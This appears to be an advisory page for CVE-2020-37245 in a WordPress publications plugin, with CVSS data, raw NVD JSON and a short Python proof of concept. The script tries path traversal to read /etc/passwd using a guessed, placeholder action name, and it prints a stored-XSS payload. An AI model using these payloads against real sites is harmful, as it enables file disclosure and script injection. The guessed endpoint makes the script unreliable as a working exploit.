Security Vulnerability Report
中文
CVE-2020-37245 CVSS 7.5 HIGH

CVE-2020-37245

Published: 2026-05-16 16:16:21
Last Modified: 2026-05-18 17:32:05
Source: [email protected]

Description

Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal sequences. Additionally, the plugin fails to sanitize input fields in publication settings, allowing stored cross-site scripting attacks through script injection in parameters like Area Width and Publication Width that execute when publications are viewed or edited.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Supsystic Digital Publications <= 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2020-37245: Path Traversal & Stored XSS # Target: Supsystic Digital Publications <= 1.6.9 # 1. Path Traversal PoC def check_path_traversal(target_url): # Vulnerable endpoint example (admin-ajax.php is common in WP) endpoint = target_url + "/wp-admin/admin-ajax.php" # Payload to read /etc/passwd payload = { "action": "some_folder_action", # Replace with actual action name if known "folder": "../../../etc/passwd", "id": "1" } try: response = requests.post(endpoint, data=payload) if "root:" in response.text: print("[+] Path Traversal Vulnerability Confirmed!") print(response.text[:200]) else: print("[-] Path Traversal not detected.") except Exception as e: print(f"Error: {e}") # 2. Stored XSS PoC Payload # Inject this into 'Area Width' or 'Publication Width' parameter xss_payload = '"><script>alert("CVE-2020-37245_XSS")</script>' print(f"XSS Payload to inject in settings: {xss_payload}") # Usage # check_path_traversal("http://target-site.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-37245", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:20.867", "lastModified": "2026-05-18T17:32:04.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal sequences. Additionally, the plugin fails to sanitize input fields in publication settings, allowing stored cross-site scripting attacks through script injection in parameters like Area Width and Publication Width that execute when publications are viewed or edited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip", "source": "[email protected]"}, {"url": "https://supsystic.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49542", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-supsystic-digital-publications-path-traversal-xss", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.